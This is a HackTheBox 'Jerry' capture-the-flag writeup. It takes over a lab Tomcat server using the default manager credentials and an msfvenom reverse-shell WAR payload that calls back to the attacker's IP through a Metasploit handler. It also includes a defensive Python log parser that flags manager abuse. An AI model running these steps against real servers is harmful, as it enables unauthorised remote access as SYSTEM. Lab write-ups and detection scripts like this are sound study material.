HackTheBox Jerry Writeup

Enjoy reading my HTB Jerry Writeup

Information Gathering

Let's start with a nmap scan to gain some knowledge about the running services on the HTB Jerry machine.

sudo nmap -p- -T4 -sC -sV -O -v 10.10.10.95

The running operating system seems to be Windows Server 2012, with Apache Tomcat (Coyote connector) listening on port 8080.

Browsing the site, we see the default page of Apache Tomcat/7.0.88. Let's keep that version in mind, as we might have to search for matching exploits, but first I will enumerate directories and files.

gobuster dir -u http://10.10.10.95:8080/ -x php -w /Lists/directory-small.txt

Gobuster found three directories:

But they all seem to be part of the default installation, and the /manager directory requires valid login credentials, which we do not have.

By clicking on "cancel" we get redirected to the 401 Unauthorized page that tells us how to set up a user and the default/example credentials: tomcat:s3cret.

Once again, the web admin was pretty lazy, as these example credentials actually work.


Gaining a reverse shell

After logging into the manager panel we can deploy a WAR file. Luckily, msfvenom can create payloads in the WAR format using the following command:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.180 LPORT=4545 -f war > shell.war

which we then can upload using the deploy function on the website.

Next, fire up Metasploit and select the handler (use exploit/multi/handler), then set LHOST and LPORT to the values used above and set the payload to java/jsp_shell_reverse_tcp.

After this is all set up, browse to http://10.10.10.95:8080/shell/ and we get a reverse shell session in msf.
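Every step of this chain goes through the manager application, so it leaves a trace in Tomcat's access log. As an added example (not part of this writeup), the following Python script scans constructed access_log lines in Tomcat's default "common" pattern and flags manager authentication failures, successful WAR deployments through the manager, and the first request an IP makes to a context after deploying; the log lines, addresses and paths are constructed to mirror the sequence above.

```python
import re

# Constructed Tomcat access_log lines in the default "common" pattern, modelled on the
# sequence in this writeup: a 401 on /manager, a login with default credentials, a WAR
# upload through the manager, and a first hit on the freshly deployed context.
SAMPLE_LOG = """\
10.10.16.180 - - [18/Jun/2018:10:01:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.16.180 - tomcat [18/Jun/2018:10:01:30 +0000] "GET /manager/html HTTP/1.1" 200 19876
10.10.16.180 - tomcat [18/Jun/2018:10:02:11 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 20543
10.10.16.180 - - [18/Jun/2018:10:02:40 +0000] "GET /shell/ HTTP/1.1" 200 0
10.10.10.1 - - [18/Jun/2018:10:05:00 +0000] "GET /docs/ HTTP/1.1" 200 1540
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
# Manager endpoints that accept a WAR: the HTML form upload and the text/scripting API.
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy")


def parse_line(line):
    """Parse one access_log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_manager_abuse(log_text):
    """Return (ip, finding) tuples for manager auth failures, WAR deployments,
    and the first request outside /manager that an IP makes after deploying."""
    findings = []
    just_deployed = set()  # IPs whose next non-manager request is worth a look
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]  # drop the query string (CSRF nonce etc.)
        if path.startswith("/manager") and rec["status"] == "401":
            findings.append((rec["ip"], "manager auth failure"))
        elif rec["method"] == "POST" and path in DEPLOY_PATHS and rec["status"] == "200":
            findings.append((rec["ip"], f"WAR deployed through manager as user {rec['user']}"))
            just_deployed.add(rec["ip"])
        elif rec["ip"] in just_deployed and not path.startswith("/manager"):
            findings.append((rec["ip"], f"first request to {path} after deploy"))
            just_deployed.discard(rec["ip"])
    return findings


if __name__ == "__main__":
    for ip, finding in find_manager_abuse(SAMPLE_LOG):
        print(f"{ip}: {finding}")
```

On a real host, point it at CATALINA_HOME/logs/localhost_access_log.*.txt; a deployment by an account that should never deploy, or any deployment from an unexpected address, is the alert a defender wants here.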

As the shell already runs as NT AUTHORITY\SYSTEM, we navigate straight to C:\Users\Administrator\Desktop\flags without any further privilege escalation.

Use type "2 for the price of 1.txt" to display both the user and the root flag.


Tags:

HTB, hackthebox, jerry, windows, apache, tomcat